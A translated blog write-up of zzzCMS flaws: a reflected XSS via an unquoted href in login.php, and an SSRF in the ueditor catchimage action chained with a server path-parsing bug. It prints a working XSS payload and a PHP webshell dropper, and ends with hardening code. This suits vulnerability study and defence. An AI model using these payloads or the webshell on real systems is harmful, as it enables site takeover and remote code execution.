zzzCMS summary

XSS

Path: /plugins/template/login.php

The $url value:

$url =conf('runmode')==1 ? $path.'index.php?location=user&backurl='.$backurl.'&act=' : $path.'?location=user&backurl='.$backurl.'&act=' ;

Here $backurl is under our control:

$backurl=getform('backurl','get');

Also note that the href attribute does not wrap $url in double quotes, so a single space is enough to end the attribute and start a new one of our choosing; press F12 to look at the page source.

The markup we want to end up with:

<a href=/?location=user&backurl=test onmouseover=javascript:alert(1111) test=&act=login>

$backurl=test onmouseover=javascript:alert(1111) test=

The alert box fires successfully.

SSRF + middleware parsing vulnerability

Vulnerability file:

/plugins/ueditor/php/controller.php

The vulnerable code receives a user-supplied url, plus two further parameters: upfolder, the path the file is uploaded to, and action, which here is catchimage.

We control the action and upfolder parameters; let's see what filtering is applied to each:

  • safeword(): strips every other symbol, keeping only letters and digits

  • safe_url(): keeps only characters from the class [a-zA-Z0-9,.:=@?_\/\s] in the input url

Then look at the function that fetches the file, down_url(). The key points: the url filtering function does not restrict the IP or domain name; the file name and extension are taken from our input url; the saved file is not renamed; the only requirements are that the extension is non-empty and that it is on the whitelist. Take a look at conf().

The legal file extensions are not visible there, but there is a config.json in the same directory as controller.php, which contains:

"fileAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp", ".flv", ".swf", ".mkv", ".avi", ".rm", ".rmvb", ".mpeg", ".mpg", ".ogg", ".ogv", ".mov", ".wmv", ".mp4", ".webm", ".mp3", ".wav", ".mid", ".rar", ".zip", ".tar", ".gz", ".7z", ".bz2", ".cab", ".iso", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf", ".txt", ".md", ".xml"],

A quick look shows the dangerous file extensions have all been filtered out, so we create an image trojan directly (an old technique). The file contents: <?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>. Host the trojan on our own server, then send a request to controller.php.

Then visit: http://www.gohosts.com/upload/file/2.jpg/.php

A shell.php is then generated under the /upload/file path.

View shell.php: the shell was written successfully. This relies on the nginx <8.03 and IIS 7.0/7.5 middleware parsing vulnerability.
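The two root causes above (an unquoted href built from $backurl in login.php, and a fetched file stored under its remote name in controller.php) could be closed as follows. This is an added hardening sketch, not zzzCMS's own code; login_link(), safe_store_name() and the sample values are illustrative assumptions.

```php
<?php
// Added hardening sketch, not zzzCMS's own code; function names are illustrative.

// 1. login.php: emit the login link with a quoted, escaped href attribute.
function login_link(string $path, string $backurl, int $runmode, string $act): string
{
    // Accept only a same-site relative path as the return target; anything else becomes "/".
    if ($backurl === '' || $backurl[0] !== '/' || substr($backurl, 0, 2) === '//') {
        $backurl = '/';
    }
    $base = ($runmode === 1) ? $path . 'index.php' : $path;
    $url  = $base . '?' . http_build_query(['location' => 'user', 'backurl' => $backurl, 'act' => $act]);
    // A quoted attribute plus ENT_QUOTES means a space, quote or '>' in $backurl
    // can no longer terminate the href and start a new attribute of its own.
    return '<a href="' . htmlspecialchars($url, ENT_QUOTES, 'UTF-8') . '">login</a>';
}

// 2. controller.php catchimage: choose the stored file name server-side.
function safe_store_name(string $remoteUrl, array $allowed): ?string
{
    $urlPath = (string) parse_url($remoteUrl, PHP_URL_PATH);
    $ext = strtolower(pathinfo($urlPath, PATHINFO_EXTENSION));
    if ($ext === '' || !in_array('.' . $ext, $allowed, true)) {
        return null;               // empty or non-whitelisted extension: refuse the fetch
    }
    // Random basename with exactly one dot: the remote name is never reused, so
    // neither a crafted name nor a double extension reaches the upload directory.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed sample values (not taken from a real deployment).
$allowed = ['.png', '.jpg', '.jpeg', '.gif'];
// The attribute-injection value from above is rejected as a return path and, even
// if it were accepted, would be emitted escaped inside a quoted attribute.
echo login_link('/', 'test onmouseover=javascript:alert(1111) test=', 0, 'login'), PHP_EOL;
// A whitelisted extension yields a random server-chosen name; a non-whitelisted one yields null.
var_dump(safe_store_name('http://example.invalid/2.jpg', $allowed));
var_dump(safe_store_name('http://example.invalid/2.php', $allowed));
```

The .jpg/.php path trick itself is a web-server and PHP-FPM configuration issue (cgi.fix_pathinfo in php.ini, security.limit_extensions in the FPM pool), so script execution in the upload directory should also be disabled regardless of the PHP-side fixes.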


Source: blog.csdn.net/oubasangdadada/article/details/104834281